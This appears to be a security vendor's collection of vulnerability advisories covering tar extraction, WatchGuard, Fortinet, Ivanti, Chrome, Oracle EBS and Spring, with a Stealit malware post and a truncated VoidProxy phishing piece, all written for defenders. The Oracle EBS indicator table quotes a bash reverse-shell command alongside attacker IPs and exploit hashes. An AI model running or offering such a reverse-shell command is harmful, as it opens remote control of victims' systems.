Attackers

Security Advisory

TARmageddon Exploitable Tar Extraction Flaw Exposes Systems to Privilege Escalation 

Summary A critical vulnerability known as Tarmageddon (CVE-2025-62518) impacts multiple tar extraction utilities and libraries, including GNU tar, libarchive, Python’s tarfile module, and the Rust async-tar library. 

Severity High 
CVSS Score 7.8 
CVEs CVE-2025-62518 
POC Available Yes, public PoC and patches available (edera-dev GitHub) 
Actively Exploited Not confirmed widespread exploitation public PoC raises opportunistic risks 
Exploited in Wild No confirmed mass exploitation at time of writing 
Advisory Version 1.0 

Overview 


Tarmageddon (CVE-2025-62518) vulnerability Improper path sanitization and symlink-target validation during extraction enable a crafted tar archive to write files outside the intended extraction directory, leading to arbitrary file overwrite, privilege escalation, or remote code execution when executed by privileged or automated services. 

                Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Tar path traversal / symlink bypass (async-tar RCE vector) CVE-2025-62518 GNU tar, libarchive, Python tarfile, Rust async-tar and downstream tools High Patches released by maintainers; reference fixes in Edera patch repository  and vendor advisories 

Technical Summary 

Root cause: insufficient canonicalization of file paths and incomplete sanitization of symlink targets within tar archive headers. Behavioral details: Path traversal via ../ sequences and chained symlinks allows crafted archives to escape the extraction root and overwrite system binaries, configuration files, or startup scripts.

A public proof-of-concept confirms this behavior in affected async-tar implementations. Fix: apply upstream and distribution patches that normalize paths and validate symlink targets (edera-dev patches).

Exploitability: public PoC exists for CVE-2025-62518, highest risk when automated extractions run with elevated privileges (CI/CD, build, backup). Manual extraction is lower risk. Impact: Malicious extraction can overwrite critical files, allow service takeover or remote code execution, and lead to full host compromise if run as root. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-62518 Tar libraries and tools async-tar, GNU tar, libarchive, Python tarfile, and any tools that use them. Crafted tar entries can bypass path checks and write outside the extraction folder (PoC available). Can overwrite files, allow privilege escalation/RCE if run as root, and contaminate build/CI artifacts. 

Remediation

  • Apply patches immediately — update tar libraries and utilities with vendor or distribution fixes (Edera patches where applicable). 
  • Disable automatic extraction of untrusted archives in gateways, ingestion services and CI/CD systems. 
  • Use least privilege for extraction processes — avoid root / Administrator contexts. 
  • Replace unsafe extraction calls (e.g., tarfile.extractall()) with secure wrappers that validate path components and reject traversal or symlink abuses. 
  • Sandbox extraction inside containers or VMs with strict filesystem scoping (read-only mounts, AppArmor/SELinux confinement). 
  • Inventory and update all images, containers, and build artifacts that bundle tar utilities or tar libraries. 

Detection Guidance: Lab verification: Use the public PoC only in isolated virtual environments to validate that patched version block path traversal and symlink exploits. 

SIEM / EDR indicators: 

  • File create/write events to sensitive paths (/etc, /usr/bin, /var, application config dirs) immediately following tar extraction processes. 
  • Creation of symlinks or reparse-points by tar-related processes. 
  • Processes invoking tar or Python extraction libraries writing outside expected extraction directories. 

Conclusion: 
Tarmageddon (CVE-2025-62518) is a high-risk archive extraction vulnerability that affects widely used tar utilities and libraries, including GNU tar, libarchive, Python’s tarfile, and the Rust async-tar implementation.

This vulnerability should be treated as a Priority-1 patch event for any environment performing automated or privileged tar extractions. Organizations are strongly advised to apply vendor patches immediately, enforce sandboxed extraction workflows, and implement strict least-privilege and path-validation controls to prevent arbitrary file overwrites, privilege escalation, and potential supply-chain compromise. 

References:  

Security Advisory

WatchGuard Patched Critical Vulnerability, Allowing RCE in Firebox Appliances 

Security Advisory : A critical vulnerability has been found in WatchGuard Firebox appliances that allows remote unauthenticated attackers to execute arbitrary code through an out-of-bounds write in the IKEv2 VPN process.

OEM WatchGuard 
Severity Critical 
CVSS Score 9.3 
CVEs CVE-2025-9242 
POC Available No 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

The vulnerability, tracked as CVE-2025-9242, which affects multiple Fireware OS versions. Users and administrators are strongly advised to upgrade to the latest patched versions of Fireware OS immediately to stay protected. 

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
​Out-of-Bounds Write Vulnerability in IKEv2 Process  CVE-2025-9242 WatchGuard Firebox Appliances with Fireware OS Critical v2025.1.1, v12.11.4, v12.5.13 (T15 & T35 models), 12.3.1_Update3 (FIPS-certified) 

Technical Summary 

Malicious actors could exploit this due to an out-of-bounds write vulnerability in the WatchGuard Fireware OS iked process.

Remote unauthenticated attackers can send crafted IKE_SA_INIT and IKE_SA_AUTH packets to trigger a stack-based buffer overflow in the ike2_ProcessPayload_CERT function, overflowing a 520-byte stack buffer without proper bounds checking.

This impacts VPN setups using IKEv2 or dynamic gateways and can continue even after deleting them if any static peers are still active on UDP port 500. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025- 9242 WatchGuard Firebox Appliances with Fireware OS 11.10.2-11.12.4_Update1, 12.0-12.11.3, 2025.1 Insufficient bounds checking in IKEv2 negotiations allows oversized identification payloads to cause buffer overflow, enabling control flow hijacking and ROP chains for code execution Arbitrary Code Execution, System Compromise,  Data Exfiltration,  Ransomware Deployment, Pivoting to Internal Networks 

Recommendations: 

You can update to the latest versions from the below table 

Vulnerable Version Resolved Version 
2025.1 2025.1.1 
12.x 12.11.4 
12.5.x (T15 & T35 models) 12.5.13 
12.3.1 (FIPS-certified release) 12.3.1_Update3 (B722811) 
11.x End of Life 

Here are some recommendations below –  

  • Disable unnecessary IKEv2 VPN configurations and restrict access to trusted networks only. 
  • Monitor logs for anomalous traffic. 
  • Implement network segmentation to limit lateral movement and regularly audit VPN setups. 

Conclusion: 
This critical vulnerability in WatchGuard Firebox appliances could allow remote attackers to achieve code execution and compromise perimeter defenses.

Although no exploits are in the wild but its unauthenticated nature and detailed public analysis make it a significant security risk requiring immediate action. Upgrading to the fixed version and applying recommended mitigations are strongly advised to ensure organizational security. 

References

Security Advisory

Fortinet Released Security Update’s; Patched Multiple High & Medium Severity Vulnerabilities

Summary: Fortinet disclosed multiple critical security vulnerabilities impacting several of its core products, including FortiPAM, FortiSwitch Manager and FortiOS platforms and patched them.

The vulnerabilities encompass issues such as improper privilege escalation, heap-based buffer overflow, weak authentication, improper certificate validation, denial-of-service risk, and race condition flaws in authentication modules.

One of the high severity issue is a weak authentication mechanism vulnerability (CVE-2025-49201) in FortiPAM & FortiSwitch Manager, and a heap overflow flaw (CVE-2025-57740) in the SSL VPN RDP bookmark functionality.

OEM Fortinet 
Severity High 
CVSS Score 7.8 
CVEs CVE-2025-49201, CVE-2025-58325, CVE-2025-57740, CVE-2025-57741 & others 
POC Available No 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

These vulnerabilities pose significant risks to enterprise environments, potentially allowing attackers to bypass authentication controls or execute arbitrary code within targeted systems. Users & Administrators are urged to update to the patched version. 

                Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Weak Authentication Mechanism CVE-2025-49201 FortiPAM, FortiSwitch Manager  High FortiPAM 1.5.1, 1.4.3 or later / FortiSwitch Manager 7.2.5 or later 
CLI Command Functionality Bypass  CVE-2025-58325 FortiOS High FortiOS 7.6.1+, 7.4.6+, 7.2.11+, 7.0.16+ 
Heap Overflow – Remote Code Execution (FortiProxy SSL VPN Bookmarks) CVE-2025-57741 FortiProxy High FortiProxy 7.2.5+, 7.0.5+ 
Heap Overflow – Remote Code Execution (SSL VPN RDP Bookmark) CVE-2025-57740 FortiOS, FortiProxy, FortiPAM, FortiSwitch Manager. Medium FortiOS 7.4.4+ / 7.2.8+ / 7.0.15+, FortiProxy 7.4.4+ / 7.2.10+, FortiPAM 1.3.0+, FortiSwitch Manager 7.2.4+ 

Technical Summary 

Multiple critical and medium-severity vulnerabilities have been identified across several Fortinet products, including FortiOS, FortiPAM, FortiProxy, FortiAnalyzer, and FortiSwitchManager.

Other vulnerabilities could allow attackers to escalate privileges, execute unauthorized code, or bypass authentication, threatening system integrity and confidentiality.

Additional flaws may enable unauthenticated users to disrupt services, intercept network traffic, or exploit race conditions to gain improper access within centralized management and authentication platforms. As the Fortinet released the security updates, quick deploy of the patches to ensure resilience against exploitation and to protect enterprise assets. 

CVE ID Component Affected  Vulnerability Details Impact 
 CVE-2025-49201 FortiPAM, FortiSwitch Manager This flaw enables remote attackers to bypass authentication by sending specially crafted HTTP requests, allowing unauthorized code or command execution within privileged access management and switch management interfaces.  Authentication Bypass / Remote Code Execution 
 CVE-2025-57740 FortiOS, FortiProxy, FortiPAM, FortiSwitch Manager This heap-based buffer overflow in the SSL VPN RDP bookmark feature can be triggered by authenticated users through crafted bookmark data, resulting in memory corruption and possible code execution in the VPN context. Remote Code Execution / System Compromise 
CVE-2025-58325 FortiOS A CLI command functionality bypass allows attackers to execute restricted administrative commands through improper input validation, potentially escalating privileges or modifying critical system parameters. Privilege Escalation / Remote Code Execution 
CVE-2025-57741 FortiProxy This heap overflow vulnerability in FortiProxy’s SSL VPN RDP bookmarks can result in memory corruption, giving attackers a pathway to execute arbitrary code remotely during VPN session initialization. Remote Code Execution / Service Compromise 

Additionally, multiple vulnerabilities have been disclosed that enable remote authentication bypass and include other issues with significant impact potential. 

Vulnerability Name CVE ID Affected Component Severity 
 FGFM protocol allows unauthenticated reset of the connection CVE-2025-26008 FortiOS, FortiProxy, FortiPAM, FortiSwitchManager. Medium 
Heap Overflow in fgfmsd CVE-2025-50571 FortiAnalyzer/Cloud, FortiManager/Cloud. Medium 
Heap buffer overflow in websocket CVE-2025-22258 FortiOS,FortiPAM, FortiProxy, FortiSRA Medium 
Improper autorization over static files CVE-2025-54822 FortiOS, FortiProxy Medium 
Insufficient Session Expiration in SSLVPN using SAML authentication CVE-2025-25252 FortiOS Medium 
Missing authentication check in OFTP service CVE-2025-53845 FortiAnalyzer Medium 
Race condion in FortiCloud SSO SAML authentication CVE-2025-54973 FortiAnalyzer Medium 
Stack-based buffer overflow on fortitoken import feature CVE-2025-46718 FortiOS, FortiProxy Medium 

Recommendations 

Update Fortinet products to the following fixed versions as soon as possible and check the updated version from the Fortinet website 

  • FortiPAM: Upgrade to version 1.5.1 or later, or 1.4.3 or latest version 
  • FortiSwitch Manager: Upgrade to version 7.2.5 or higher 
  • FortiOS: Upgrade to versions 7.6.6+, 7.4.9+, 7.2.11+,7.0.16+ depending on the release series 
  • FortiProxy: Upgrade to 7.6.3+, 7.4.9+ and latest version 
  • FortiAnalyzer: Upgrade to 7.6.3+, 7.4.7+, 7.2.11+, 7.0.14+ latest version 

Patches are available and should be applied immediately. For environments where immediate patching is not immediately feasible, you can also follow the below recommendations : 

  • Enable multi-factor authentication (MFA) to reduce unauthorized access risk 
  • Restrict network access to management interfaces to trusted personnel only 
  • Monitor logs for unusual brute-force attempts or anomalous login activity 
  • Apply the principle of least privilege to limit access to VPN and management services 
  • Use firewalls with strict whitelisting to block external attack vectors to vulnerable services 

Conclusion: 
The recent Fortinet advisories underscore the critical importance of timely vulnerability management, particularly for products controlling privileged access and remote connectivity.

The flaws in authentication and memory management can jeopardize the security posture of enterprise environments.

Organizations should urgently apply patches, monitor for suspicious login and session activity, and implement proactive security measures to reduce exploitation risks. Proactive response and regular updates are essential to maintaining robust security against evolving threats targeting critical infrastructure. 

References

Hashtags 

#Infosec #CyberSecurity #Fortinet #FortiPAM #SQL #RCE #SecurityAdvisory #Vulnerabilitymanagement # PatchManagement #CISO #CXO #Intrucept  

Security Advisory

Ivanti Endpoint Manager Vulnerabilities Expose Systems to RCE, SQL & Privilege Escalation Risks 

Summary : Security Advisory: Ivanti has publicly disclosed 13 vulnerabilities affecting its Endpoint Manager (EPM) 2024 and earlier releases. It includes 2 high-severity issues, 1 enabling remote code execution (RCE) and the other supporting privilege escalation alongside 11 medium-severity SQL injection flaws. Successful exploitation could lead to privilege escalation or remote code execution. 

OEM Ivanti 
Severity High 
CVSS Score 8.8 
CVEs CVE-2025-11622, CVE-2025-9713 & CVEs for SQL 
POC Available No 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

These vulnerabilities are considered critical for enterprise environments, as they could permit attackers to gain unauthorized access, execute arbitrary code, or extract sensitive database information from vulnerable endpoints.

Administrators are urged to update to the latest version to mitigate the attack and prevent potential exploitation. 

                Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Insecure Deserialization  CVE-2025-11622 Ivanti Endpoint Manager 2024 SU3 SR1 and prior  High 2024 SU4   
Path Traversal – Remote Code Execution  CVE-2025-9713 Ivanti Endpoint Manager 2024 SU3 SR1 and prior High 

Technical Summary 

2 severe vulnerabilities in Ivanti Endpoint Manager significantly increase the risk to affected systems. One of the issues involves insecure deserialization, which may allow a local authenticated attacker to elevate their privileges and gain unauthorized access to sensitive functions or data.

Another notable vulnerability is a path traversal flaw that can lead to remote code execution when triggered by a remote unauthenticated attacker, provided certain user interaction occurs. In addition to these, multiple instances of SQL injection have been identified across various components of the application. These flaws could be exploited by remote authenticated users to retrieve unauthorized information from the backend database, potentially exposing sensitive data. 

These vulnerabilities underscores the importance of implementing secure coding practices, validating user input, and applying timely security patches to minimize risk and protect system assets. 

CVE ID Component Affected  Vulnerability Details Impact 
 CVE-2025-11622 Ivanti Endpoint Manager  This flaw allows a local authenticated attacker to escalate privileges on the EPM Core server by exploiting deserialization routines.  Privilege Escalation / Remote Code Execution 
 CVE-2025-9713 Ivanti Endpoint Manager  This enables remote unauthenticated attackers to achieve remote code execution, with user interaction required to trigger malicious file import or configuration actions. Remote Code Execution / System Compromise 

In addition, releasing eleven CVEs for SQL injection vulnerabilities that permit remote authenticated attackers to access and read arbitrary data from the database.  

Vulnerability Name CVE ID Affected Component Severity 
SQL Injection Flaws CVE-2025-1162 
CVE-2025-62383 
CVE-2025-62384 
CVE-2025-62385 
CVE-2025-62386 
CVE-2025-62387 
CVE-2025-62388 
CVE-2025-62389 
CVE-2025-62390 
CVE-2025-62391 
CVE-2025-62392 		Ivanti Endpoint Manager  Medium 

Recommendations 

Update Ivanti Endpoint Manager to the following versions when available: 

  • 2024 SU4 for high-severity vulnerabilities (targeted release November 12, 2025) 
  • 2024 SU5 for SQL injection vulnerabilities (scheduled Q1 2026) 

Patches are currently under development, here are some mitigations below to protect the environment  

  • Use Ivanti EPM 2024 SU3 SR1 to reduce the risk associated with the insecure deserialization vulnerability.  
  • Limit access to the EPM Core server to local administrators only. 
  • Use a firewall with a strict whitelisting configuration to block remote access. 
  • Avoid importing untrusted configuration files into the EPM Core server. 
  • Remove the reporting database user from the EPM configuration to mitigate the SQL injection vulnerabilities. But this action will disable reporting functionality, as the reporting database user is required to run reports. 

Conclusion: 
These vulnerabilities pose a significant threat to organizations relying on Ivanti Endpoint Manager for enterprise device management, potentially enabling privilege escalation, remote code execution, and unauthorized data access. Enterprises are strongly urged to implement Ivanti’s recommended mitigations without delay to reduce immediate risk. Additionally, organizations should prepare for the timely deployment of the upcoming security updates as they become available. Proactive action is essential to maintaining the security and integrity of endpoint management infrastructure. 

References

Blogs

New Stealit Malware Campaign Leveraged VPN installers to Exploit Node.js as per Fortinet

Cyber criminals are installing Stealit malware campaign that leverages VPN installers to exploit Node.js’ Single Executable Application (SEA) features and distribute its payloads. In the past Stealit campaigns were built using Electron, an open-source framework that packages Node.js scripts as NSIS installers for distribution. 

As per Fortinet cyber criminals deployed a new active Stealit malware campaign deploying via disguised applications.

Malware campaign are now designed and placed in such a way are mostly AI-generated, legitimate-looking code to infiltrate systems. These malwares can evade detection and gain persistent access to maximize disruption worldwide.

Researchers observed that filenames this malware is used and distributed as disguised installers for games and VPN applications. This was same as observed in previous campaigns.

How the campaign was devised?

First the cyber criminals gained initial access is gained via fake game and VPN installers bundled in PyInstaller and common compressed archives. Then uploaded to file-sharing sites such as Mediafire and Discord.

The threat actor then employed heavy obfuscation and numerous anti-analysis techniques to evade detection and complicate analysis.

Purpose of Stealit Campaign

The present situation are making attackers more desperate try to integrate these malware in games, demo s to make them appear legitimate. In some situations, the game might be real but one cannot deny presence of malware.

These files look safe, but they are designed to run code that steals credentials, drains cryptocurrency wallets, or takes over accounts.

In some cases, attackers slip the malware into an update after release so it’s not suspicious from the get-go. Other times, they redirect players off a storefront to an external download that evades platform checks.

When the malware binary was updated, Stealit has relocated its panel website to new domains. When reserachers first observed this campaign, the panel—also functioning as the Command-and-Control (C2) server—was hosted at stealituptaded[.]lol. As per researchers the domain quickly became inaccessible as the C2 server was moved to iloveanimals[.]shop.

Accessing the panel leads to a commercial website for Stealit, which promotes itself as offering “professional data extraction solutions” through various subscription plans.

A dedicated features page outlines its capabilities, highlighting typical remote access trojan (RAT) functionalities such as file extraction, webcam control, live screen monitoring, and ransomware deployment targeting both Android and Microsoft Windows systems. The site also features instructional videos that demonstrate how the service operates on each platform.

The website offers payment plans for the Windows and Android versions of the stealer, with lifetime subscriptions available for approximately $ 500 and $ 2,000, respectively.

The service also has a Telegram channel named StealitPublic, where they post updates and promotions to possible clients. The main contact person is a Telegram user with the handle @deceptacle.

Operators of the malware have also imbued the latest Stealit variant with heavily obfuscated code and comprehensive anti-analysis checks. Such findings were regarded by Bugcrowd Chief Strategy and Trust Officer Trey Ford as indicative of an evolving focused cyber campaign.

At the end we should remember that threat actors can time their campaigns for maximum effect and any time new content could appear and any hype paves way for “early access” invites much more believable.

We often or might encounter weather On Discord or Telegram, attackers rely on social engineering and compromise accounts by sending messages as ‘try our game” and subsequently that messages also reach friends.

Victims often trust the sender and install the file this extends the scam’s reach.

(Reference: https://www.fortinet.com/blog/threat-research/stealit-campaign-abuses-nodejs-single-executable-application)

Security Advisory

Google Chrome Patched High-Severity Memory Vulnerabilities  

Summary : Security Advisory: Google recently rolled out an update for Chrome to address two high & and one medium severity vulnerabilities.

OEM Google 
Severity High 
CVSS Score 8.0 
CVEs CVE-2025-11458, CVE-2025-11460, CVE-2025-11211 
POC Available No 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

A heap buffer overflow in the Sync component and a use-after-free (UAF) vulnerability in the Storage component have been fixed, along with other security issues.

Users and administrators are advised to apply the latest patch as soon as possible to ensure their systems remain secure. 

                Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Heap Buffer Overflow in Sync  CVE-2025-11458 Chrome (Windows, Mac, Linux)  High 141.0.7390.65/66 
Use-After-Free in Storage  CVE-2025-11460 Chrome (Windows, Mac, Linux) High 141.0.7390.65/66 
Out-of-Bounds Read in WebCodecs CVE-2025-11211 Chrome (Windows, Mac, Linux) Medium 141.0.7390.65/66 

Technical Summary 

Google released an update for the Chrome Stable channel, addresses three significant security vulnerabilities related to memory safety. The update addresses multiple critical memory-related vulnerabilities within Chrome’s core components.

These include a flaw that could allow attackers to corrupt memory during browser data synchronization, potentially enabling arbitrary code execution, and another vulnerability in the storage system that involves improper memory handling after an object is freed, which could also lead to exploitation through crafted web content.

Additionally, a medium-severity issue was fixed in the media processing API that could cause exposure of sensitive memory or impact browser stability when handling certain media files. These fixes are part of ongoing efforts to improve browser security by mitigating risks of remote code execution, data exposure, and crashes. 

CVE ID Component Affected  Vulnerability Details Impact 
 CVE-2025-11458 Chrome Sync component Heap buffer overflow in the Sync component could allow memory corruption and potentially enable arbitrary code execution when handling synchronization data.  Remote Code Execution / Data Leakage 
 CVE-2025-11460 Chrome Storage component Use-after-free in the Storage component could allow attackers to access freed memory, potentially leading to code execution or information disclosure. Remote Code Execution / Browser Instability 
CVE-2025-11211 Chrome WebCodecs API Out-of-bounds read in the WebCodecs API could expose memory contents or crash the browser when processing malformed media inputs. Memory Disclosure / Browser Crash 

Recommendations 

Update Chrome immediately to the following versions: 

  • Windows/Mac: Chrome v141.0.7390.65/66 
  • Linux: Chrome v141.0.7390.65 

Here are bellow recommended actions 

  • Manual Update Check: Navigate to Settings → Help → About Google Chrome to force update. 
  • Enterprise Patch Management: Enforce Chrome auto-updates across managed systems. 
  • Threat Monitoring: Actively monitor browser crash reports, endpoint security alerts, and system/network logs for suspicious behavior. 

Conclusion: 
This update reflects Chrome’s continued commitment to robust browser security by addressing multiple critical memory vulnerabilities that could otherwise be exploited for remote code execution, data exposure, or browser instability.

Promptly applying updates is essential to reduce potential attack surfaces, maintain browser stability, and safeguard user data against emerging threats. 

References

Security Advisory

Critical Oracle EBS 0-Day Hit by Clop Ransomware; Oracle Released Emergency Patch 

Summary : Security Advisory: Clop Ransomware aimed at extortion of emails targeting customers of Oracle E-Business Suite. The zero-day vulnerability affected Oracle EBusiness Suite (EBS), specifically the Concurrent Processing component used with BI Publisher Integration and is remotely exploitable without authentication. This allows attackers to execute arbitrary code via HTTP.

OEM Oracle 
Severity Critical 
CVSS Score 9.8 
CVEs CVE-2025-61882 
POC Available Yes 
Actively Exploited Yes 
Advisory Version 1.0 

Overview 

Oracle released an emergency patch and Clop ransomware group actively exploited this flaw in real-world data theft campaigns targeting vulnerable versions using by the organizations.

All EBS versions from 12.2.3 to 12.2.14 are affected and immediate patching requires mitigate the vulnerability. 

                Vulnerability Name CVE ID Product Affected Severity Affected Version 
RCE vulnerability in Oracle E-Business Suite  CVE-2025-61882 Oracle E-Business Suite  Critical 12.2.3 through 12.2.14 

Technical Summary 

The vulnerability allows attackers to gain remote code execution by sending specially crafted HTTP requests to exposed Oracle EBS services. Once exploited, it enables full system compromise, including reverse shell access. The vulnerability has been using by Clop ransomware group in conjunction with other previously known EBS flaws to exfiltrate sensitive data and extort victims. Indicators of compromise (IoCs) such as malicious IPs, shell commands, and exploit files have been published to help organizations detect past intrusions.

Oracle’s fix includes the patch for this flaw but also mitigates additional exploitation paths identified during their internal investigation. 

CVE ID Component Affected  Vulnerability Details Impact 
CVE-2025-61882 BI Publisher Integration A critical unauthenticated RCE in Oracle EBusiness Suite affecting the Concurrent Processing/BI Publisher integration.   Full system compromise, data theft.  

Recommendations 

Users And Administrators should immediately apply the Security Patch for CVE202561882 on all affected Oracle E-Business Suite systems: 

  • Log in to My Oracle Support. 
  • Use the patch availability document & search for the patch specific to CVE-2025-61882 for your OS and Oracle EBS version. 

Prerequisite: Ensure the October 2023 Critical Patch Update (CPU) is already installed. 

Here are some recommendations below 

  • If immediate patching is not possible, restrict HTTP/HTTP/HTTPS access to the EBS application from untrusted networks. 
  • Review server logs, network traffic and system processes to detect signs of exploitation. 
  • Monitor for known Indicators of Compromise (IoCs) provided by Oracle from the table below. 

IOCs 
 

Indicator Type Description 
200[.]107[.]207[.]26 IP Potential GET and POST activity 
185[.]181[.]60[.]11 IP Potential GET and POST activity 
sh -c /bin/bash -i >& /dev/tcp// 0>&1 Command Establish an outbound TCP connection over a specific port 
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip 
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py 
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py 

Source: Oracle 

Conclusion: 
This is the ongoing threat exploitation by the ransomware group, particularly for unpatched Oracle EBS deployments.

As this is being actively exploited in the wild, upgrade to the supported patched version and organizations should also review logs, investigate for signs of compromise using Oracle’s IoCs, and strengthen network access controls around EBS systems. Immediate action is required to reduce the risk of further exploitation, data loss and operational disruption. 

References

Security Advisory

Chrome Security Update Fixed Active Zero-Day Exploit & Multiple High-Severity Vulnerabilities 

Security advisory : Google has issued a Stable Channel Update for Chrome to address 4 high-severity vulnerabilities, including one zero-day vulnerability (CVE-2025-10585) actively exploited in the wild.

OEM Google 
Severity High 
CVSS Score N/A 
CVEs CVE-2025-10585, CVE-2025-10500, CVE-2025-10501, CVE-2025-10502 
POC Available No 
Actively Exploited Yes 
Exploited in Wild Yes 
Advisory Version 1.0 

Overview 

This flaw, a Type Confusion in the V8 JavaScript and WebAssembly engine, can allow remote attackers to execute arbitrary code outside of Chrome’s security sandbox when users visit maliciously crafted web pages. Users and administrators are urged to update to the latest Chrome version immediately to mitigate potential exploitation 

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
​ Type Confusion in V8 Engine  CVE-2025-10585 Chrome (Windows, Mac, Linux)  High  140.0.7339.185/.186 

Technical Summary 

The zero-day vulnerability in Chrome’s V8 engine arises from a type of confusion flaw, where object types are misinterpreted, leading to logical errors and memory corruption.

Attackers can exploit this issue when users visit maliciously crafted websites, enabling arbitrary code execution and possible sandbox escape.

This flaw has been confirmed as actively exploited in the wild. In addition to this zero-day, the update also fixes three other high-severity issues, a use-after-free in the Dawn graphics abstraction layer that could lead to memory corruption, a use-after-free in WebRTC that may enable remote code execution, and a heap buffer overflow in ANGLE that could result in program crashes or arbitrary code execution. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-10585 Google Chrome (Windows, Mac, Linux) Type confusion in the V8 JavaScript engine could allow memory corruption, arbitrary code execution, and potential sandbox escape Remote Code Execution / Sandbox Escape 

Other Vulnerabilities  

In addition to the zero-day, Google patched three other high-severity vulnerabilities in the same stable channel release. 

Vulnerability Name CVE ID Affected Component Severity 
​Use-after-free in Dawn CVE-2025-10500 Chrome GPU Renderer Component (Dawn)  High 
Use-after-free in WebRTC CVE-2025-10501 Chrome WebRTC Audio/Video Communication Module High 
Heap Buffer Overflow in ANGLE CVE-2025-10502 Chrome Graphics Translation Engine (ANGLE) High 

Recommendations

Update Chrome immediately to the following versions: 

  • Windows/Mac: Chrome 140.0.7339.185/.186 
  • Linux: Chrome 140.0.7339.185 

Here are some Recommendations below 

  • Manual Update Check: Navigate to “Settings → Help → About Google Chrome” to trigger the update. 
  • Patch Management: Ensure enterprise update policies enforce Chrome auto-updates. 
  • Threat Monitoring: Keep monitoring logs for any signs of exploitation 

Conclusion: 
There are high vulnerabilities in Google Chrome, including an actively exploited zero-day flaw in the V8 JavaScript engine that poses a significant risk of remote code execution and sandbox escape.

Given the severity and confirmed exploitation in the wild, it is imperative that all users and administrators promptly update to the latest Chrome versions to mitigate potential attacks. Immediate action is essential to safeguard systems, data, and user privacy in light of these emerging threats. 

References

  • https://cybersecuritynews.com/google-chrome-0-day-vulnerability-exploited/  

Security Advisory

Spring Security & Framework Authorization Bypass Vulnerabilities Patched 

Security advisory: Two new security vulnerabilities have been discovered in the Spring Framework and Spring Security components identified as CVE-2025-41248 and CVE-2025-41249.

Severity Medium 
CVSS Score 4.4 
CVEs CVE-2025-41248, CVE-2025-41249 
POC Available No 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

These issues affect applications that use method-level security annotations like @PreAuthorize to control access to certain methods or features. Under specific conditions when generics are used in parent classes or interfaces, these annotations may not be properly detected, which could allow unauthorized users to access restricted functionality. 

                Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Spring Security Authorization Bypass Vulnerability  CVE-2025-41248 Spring Security  Medium 6.5.4 (Open Source) 6.4.10 (Open Source)  
Spring Framework Annotation Detection Vulnerability CVE-2025-41249 Spring Framework Medium 6.2.11 (Open Source) 6.1.23 (Commercial Support) 5.3.45 (Commercial Support)  

Technical Summary 

The vulnerability arises when Spring applications use inheritance (where a class inherits methods from another class) and generics (a way to define methods or classes that can handle different types of data) together. If a secured method, like one marked with the @PreAuthorize annotation (used to enforce security checks), is declared in a generic superclass or interface without clear type definitions, Spring might fail to recognize the security annotation at runtime. This means unauthorized users could potentially access these methods. This issue affects Spring Security versions 6.4.0 to 6.5.3 and Spring Framework versions 5.3.0 to 6.2.10. The Spring team has since released updates to better handle security annotations in such cases, ensuring proper authorization checks. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-41248 Spring Security 6.4.0 – 6.4.9 6.5.0 – 6.5.3 Spring Security may fail to detect method-level security annotations applied to generic superclasses or interfaces, resulting in unauthorized access. Unauthorized access  
CVE-2025-41249 Spring Framework 6.2.0 – 6.2.10 6.1.0 – 6.1.22 5.3.0 – 5.3.44 Older, unsupported versions are also affected.  Spring Framework does not consistently recognize security annotations on methods declared in generic superclasses or interfaces, which can lead to authorization bypass. Authorization bypass. 

Remediation

Users should immediately update to the latest patched versions of Spring Security and Spring Framework: 

Spring Security 
Affected Version Fix Version 
6.5.x 6.5.4 
6.4.x 6.4.10 
Spring Framework 
Affected Version Fix Version 
6.2.x 6.2.11 
6.1.x 6.1.23 
6.0.x N/A (OOS) 
5.3.x 5.3.45 

Conclusion: 
These vulnerabilities cause Spring Security and Spring Framework to sometimes miss detecting method-level security annotations in generic type hierarchies. This can allow unauthorized users to bypass authorization checks, exposing protected functionality. While the severity is medium, it is important to update to the fixed versions promptly and review security annotation usage on generics to maintain proper access control. 

References

 

Security Advisory

VoidProxy PhaaS Uses MFA Bypass, Hijacking Google & Microsoft Logins

Security Advisory

Security researchers from Okta have uncovered a stealthy and sophisticated Phishing-as-a-Service (PhaaS) framework known as VoidProxy.

This has been used to hijack Microsoft, Google and even integrated SSO accounts protected by providers like Okta. Unlike traditional phishing kits, VoidProxy employs Adversary-in-the-Middle (AiTM) tactics to capture real-time credentials, MFA tokens and bypassing several standard authentication protections.

VoidProxy’s infrastructure leverages disposable domains, Cloudflare protections, dynamic DNS which all of mimicking as legitimate enterprise setups becoming extremely difficult to detect, analyze. The attackers are running phishing campaigns with little technical effort, enabling wide-scale compromises that lead to email compromise, fraud and data breaches.

Its attack chain is built to evade modern email security, identity defenses, and analysis tools by leveraging the following:

  • CAPTCHA Filtering: Victims are first shown a CAPTCHA challenge before any phishing content loads. This helps block bots and automated security scanners.
  • Cloudflare Workers: Used to deliver customized phishing pages and smartly direct traffic to the attacker’s backend servers.
  • URL Redirection Chains: The phishing links in emails go through several redirects (often using shortened URLs) before landing on fake login pages. This helps bypass spam filters and security tools.
  • Dynamic DNS: These services let attackers quickly create domain names that point to specific IP addresses, making their infrastructure flexible and harder to track.    

